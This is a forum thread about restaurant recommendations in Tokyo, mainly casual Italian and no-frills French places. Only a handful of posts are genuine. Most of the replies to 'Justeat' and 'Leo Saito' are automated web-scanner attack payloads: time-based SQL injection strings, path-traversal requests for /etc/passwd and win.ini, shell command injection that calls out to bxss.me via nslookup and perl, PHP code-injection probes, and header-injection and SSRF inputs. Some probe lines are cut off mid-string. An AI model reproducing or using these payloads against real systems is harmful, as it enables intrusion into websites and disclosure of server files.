Plan to go to Dal Matto but it close on the day I want to go. So I neeed a recommendation for casual Italian places in Tokyo, preferably with great pasta
how about no frill French restaurants? New, classic, or even home cooking style are fine, but preferably the master chef still cooks himself or herself. Thanks!
@Justeat unfortunately don’t have much exp with the casual places - only been to some of the more formal places. I liked Quintessence & Esquisse more than others (Equateur, Effervescence, etc), not none of them made me want to go back often .Might be worth staring a new thread!
8 Comments
Would you recommend Piccolo Grande? This is the one pop-up through my internet search
re: Justeat
Ybg83jqE
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+405-405-1=0+0+0+1
re: Justeat
-1 OR 3+405-405-1=0+0+0+1
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
ifr1P6zY
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+218-218-1=0+0+0+1
re: Justeat
-1 OR 3+218-218-1=0+0+0+1
re: Justeat
IuKVixte'; waitfor delay '0:0:15' --
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
-5 OR 705=(SELECT 705 FROM PG_SLEEP(15))--
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
-5) OR 620=(SELECT 620 FROM PG_SLEEP(15))--
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
-1)) OR 919=(SELECT 919 FROM PG_SLEEP(15))--
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
WSfZJ6bd' OR 901=(SELECT 901 FROM PG_SLEEP(15))--
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
XyEGrkhk') OR 372=(SELECT 372 FROM PG_SLEEP(15))--
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
Y16cZ19p')) OR 344=(SELECT 344 FROM PG_SLEEP(15))--
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
gaxMPNM2'; waitfor delay '0:0:15' --
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
-5 OR 132=(SELECT 132 FROM PG_SLEEP(15))--
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
-5) OR 756=(SELECT 756 FROM PG_SLEEP(15))--
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@wKqCu
re: Justeat
-1)) OR 324=(SELECT 324 FROM PG_SLEEP(15))--
re: Justeat
EN1Wv87z' OR 242=(SELECT 242 FROM PG_SLEEP(15))--
re: Justeat
Ef6r81Rf') OR 366=(SELECT 366 FROM PG_SLEEP(15))--
re: Justeat
gn1EnCuD')) OR 945=(SELECT 945 FROM PG_SLEEP(15))--
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@XRf8b
re: Justeat
1limBo7xO
re: Justeat
response.write(9355961*9221736)
re: Justeat
'+response.write(9355961*9221736)+'
re: Justeat
"+response.write(9355961*9221736)+"
re: Justeat
%0abcc:074625.67-16741.67.aedfb.19990.2@bxss.me
re: Justeat
to@example.com>%0d%0abcc:074625.67-16742.67.aedfb.19990.2@bxss.me
re: Justeat
../../../../../../../../../../../../../../etc/passwd
re: Justeat
../../../../../../../../../../../../../../windows/win.ini
re: Justeat
file:///etc/passwd
re: Justeat
<esi:include src="http://bxss.me/rpb.png"/>
re: Justeat
../../../../../../../../../../../../../../../proc/version
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Justeat
../../../../../../../../../../etc/passwd%00.jpg
re: Justeat
${10000452+9999199}
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Justeat
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Justeat
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Justeat
/etc/passwd
re: Justeat
echo lrevlk$()\ jsekoi\nz^xyu||a #' &echo lrevlk$()\ jsekoi\nz^xyu||a #|" &echo lrevlk$()\ jsekoi\nz^xyu||a #
re: Justeat
%2fetc%2fpasswd
re: Justeat
&echo vxhbyc$()\ eyocxe\nz^xyu||a #' &echo vxhbyc$()\ eyocxe\nz^xyu||a #|" &echo vxhbyc$()\ eyocxe\nz^xyu||a #
re: Justeat
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Justeat
|echo oybtcp$()\ ghbxmp\nz^xyu||a #' |echo oybtcp$()\ ghbxmp\nz^xyu||a #|" |echo oybtcp$()\ ghbxmp\nz^xyu||a #
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Justeat
(nslookup hitwqdyxcpiluf62e2.bxss.me||perl -e "gethostbyname('hitwqdyxcpiluf62e2.bxss.me')")
re: Justeat
)
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Justeat
$(nslookup hitsylvtuedgq5eb2c.bxss.me||perl -e "gethostbyname('hitsylvtuedgq5eb2c.bxss.me')")
re: Justeat
!(()&&!|*|*|
re: Justeat
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Justeat
&nslookup hitminapnmnkp07888.bxss.me&'\"`0&nslookup hitminapnmnkp07888.bxss.me&`'
re: Justeat
^(#$!@#$)(()))******
re: Justeat
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Justeat
&(nslookup hitkhbofhtdww19c3e.bxss.me||perl -e "gethostbyname('hitkhbofhtdww19c3e.bxss.me')")&'\"`0&(nslookup hitkhbofhtdww19c3e.bxss.me||perl -e "gethostbyname('hitkhbofhtdww19c3e.bxss.me')")&`'
re: Justeat
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Justeat
|(nslookup hitxbotewwqjm5b8a1.bxss.me||perl -e "gethostbyname('hitxbotewwqjm5b8a1.bxss.me')")
re: Justeat
file:///etc/passwd
re: Justeat
`(nslookup hitfoyqorbinoc1fa5.bxss.me||perl -e "gethostbyname('hitfoyqorbinoc1fa5.bxss.me')")`
re: Justeat
/\../\../\../\../\../\../\../etc/passwd
re: Justeat
;(nslookup hitsoozkeuemrfa90e.bxss.me||perl -e "gethostbyname('hitsoozkeuemrfa90e.bxss.me')")|(nslookup hitsoozkeuemrfa90e.bxss.me||perl -e "gethostbyname('hitsoozkeuemrfa90e.bxss.me')")&(nslookup hitsoozkeuemrfa90e.bxss.me||perl -e "gethostbyname('hitsoozkeuemrfa90e.bxss.me')")
re: Justeat
/WEB-INF/web.xml
re: Justeat
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Justeat
'.gethostbyname(lc('hitoy'.'vixewepw57161.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(83).chr(102).chr(83).'
re: Justeat
C:\WINDOWS\system32\drivers\etc\hosts
re: Justeat
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Justeat
".gethostbyname(lc("hitre"."wpzpjgtv10d70.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(67).chr(98).chr(88)."
re: Justeat
../../../../../../../../../../windows/win.ini%00.jpg
re: Justeat
Http://bxss.me/t/fit.txt
re: Justeat
/../../../../../../../../../../boot.ini
re: Justeat
http://bxss.me/t/fit.txt%3F.jpg
re: Justeat
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Justeat
/etc/shells
re: Justeat
..\..\..\..\..\..\..\..\windows\win.ini
re: Justeat
c:/windows/win.ini
re: Justeat
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Justeat
bxss.me
re: Justeat
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Justeat
HttP://bxss.me/t/xss.html?%00
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Justeat
bxss.me/t/xss.html?%00
re: Justeat
"+"A".concat(70-3).concat(22*4).concat(104).concat(82).concat(108).concat(75)+(require"socket"
Socket.gethostbyname("hitwr"+"nnnttxfu3df3d.bxss.me.")[3].to_s)+"
re: Justeat
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Justeat
'+'A'.concat(70-3).concat(22*4).concat(102).concat(69).concat(97).concat(74)+(require'socket'
Socket.gethostbyname('hitau'+'rsfncydu32fcc.bxss.me.')[3].to_s)+'
re: Justeat
WEB-INF/web.xml
re: Justeat
WEB-INF\web.xml
re: Justeat
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Justeat
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Justeat
';print(md5(31337));$a='
re: Justeat
";print(md5(31337));$a="
re: Justeat
'"
re: Justeat
${@print(md5(31337))}
re: Justeat
<!--
re: Justeat
${@print(md5(31337))}\
re: Justeat
'.print(md5(31337)).'
re: Justeat
1
re: Justeat
1
re: Justeat
-1 OR 2+665-665-1=0+0+0+1 --
re: Justeat
-1 OR 3+665-665-1=0+0+0+1 --
re: Justeat
-1 OR 2+390-390-1=0+0+0+1
re: Justeat
-1 OR 3+390-390-1=0+0+0+1
re: Justeat
-1' OR 2+607-607-1=0+0+0+1 --
re: Justeat
-1' OR 3+607-607-1=0+0+0+1 --
re: Justeat
-1' OR 2+919-919-1=0+0+0+1 or 'harpTspx'='
re: Justeat
-1' OR 3+919-919-1=0+0+0+1 or 'harpTspx'='
re: Justeat
-1" OR 2+541-541-1=0+0+0+1 --
re: Justeat
-1" OR 3+541-541-1=0+0+0+1 --
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
oxQDYUZo'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 318=(SELECT 318 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 255=(SELECT 255 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 253=(SELECT 253 FROM PG_SLEEP(15))--
re: Justeat
t2KvtqVs' OR 131=(SELECT 131 FROM PG_SLEEP(15))--
re: Justeat
ijDDgjmB') OR 22=(SELECT 22 FROM PG_SLEEP(15))--
re: Justeat
YyBXl1BH')) OR 108=(SELECT 108 FROM PG_SLEEP(15))--
re: Justeat
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@ee6LO
BOTTEGA, REGALO and ROMANTICO are the best.
I don't particulary recommend Piccolo Grande you mentioned.
re: Leo Saito
k7bnvuhp
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+852-852-1=0+0+0+1
re: Leo Saito
-1 OR 3+852-852-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
76akpumV
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+925-925-1=0+0+0+1
re: Leo Saito
-1 OR 3+925-925-1=0+0+0+1
re: Leo Saito
nLTEeItI'; waitfor delay '0:0:15' --
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
-5 OR 174=(SELECT 174 FROM PG_SLEEP(15))--
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
-5) OR 972=(SELECT 972 FROM PG_SLEEP(15))--
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
-1)) OR 254=(SELECT 254 FROM PG_SLEEP(15))--
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
YN6D3Soq' OR 738=(SELECT 738 FROM PG_SLEEP(15))--
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
7I1W344H') OR 368=(SELECT 368 FROM PG_SLEEP(15))--
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
5cudp4EC')) OR 625=(SELECT 625 FROM PG_SLEEP(15))--
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
ogd2EQoE'; waitfor delay '0:0:15' --
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
-5 OR 623=(SELECT 623 FROM PG_SLEEP(15))--
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
-5) OR 533=(SELECT 533 FROM PG_SLEEP(15))--
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@bR4m4
re: Leo Saito
-1)) OR 261=(SELECT 261 FROM PG_SLEEP(15))--
re: Leo Saito
r9mJOZzB' OR 276=(SELECT 276 FROM PG_SLEEP(15))--
re: Leo Saito
QAJVA1JY') OR 146=(SELECT 146 FROM PG_SLEEP(15))--
re: Leo Saito
S7Wb8uIK')) OR 288=(SELECT 288 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@TkFaK
re: Leo Saito
1tXg684AO
re: Leo Saito
response.write(9268658*9326656)
re: Leo Saito
'+response.write(9268658*9326656)+'
re: Leo Saito
"+response.write(9268658*9326656)+"
re: Leo Saito
%0abcc:074625.67-16789.67.a8a69.19990.2@bxss.me
re: Leo Saito
<esi:include src="http://bxss.me/rpb.png"/>
re: Leo Saito
to@example.com>%0d%0abcc:074625.67-16790.67.a8a69.19990.2@bxss.me
re: Leo Saito
../../../../../../../../../../../../../../etc/passwd
re: Leo Saito
${9999616+9999026}
re: Leo Saito
../../../../../../../../../../../../../../windows/win.ini
re: Leo Saito
file:///etc/passwd
re: Leo Saito
../../../../../../../../../../../../../../../proc/version
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Leo Saito
../../../../../../../../../../etc/passwd%00.jpg
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Leo Saito
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Leo Saito
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Leo Saito
/etc/passwd
re: Leo Saito
%2fetc%2fpasswd
re: Leo Saito
echo zzjfbm$()\ hghpiv\nz^xyu||a #' &echo zzjfbm$()\ hghpiv\nz^xyu||a #|" &echo zzjfbm$()\ hghpiv\nz^xyu||a #
re: Leo Saito
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Leo Saito
&echo tvsryh$()\ mgyssq\nz^xyu||a #' &echo tvsryh$()\ mgyssq\nz^xyu||a #|" &echo tvsryh$()\ mgyssq\nz^xyu||a #
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Leo Saito
|echo jybyqw$()\ kdhhbp\nz^xyu||a #' |echo jybyqw$()\ kdhhbp\nz^xyu||a #|" |echo jybyqw$()\ kdhhbp\nz^xyu||a #
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Leo Saito
(nslookup hithyksajxygh75263.bxss.me||perl -e "gethostbyname('hithyksajxygh75263.bxss.me')")
re: Leo Saito
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Leo Saito
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Leo Saito
$(nslookup hitemsmpyytorf0d48.bxss.me||perl -e "gethostbyname('hitemsmpyytorf0d48.bxss.me')")
re: Leo Saito
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Leo Saito
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Leo Saito
&nslookup hitnzrgbcimzu5eec3.bxss.me&'\"`0&nslookup hitnzrgbcimzu5eec3.bxss.me&`'
re: Leo Saito
invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.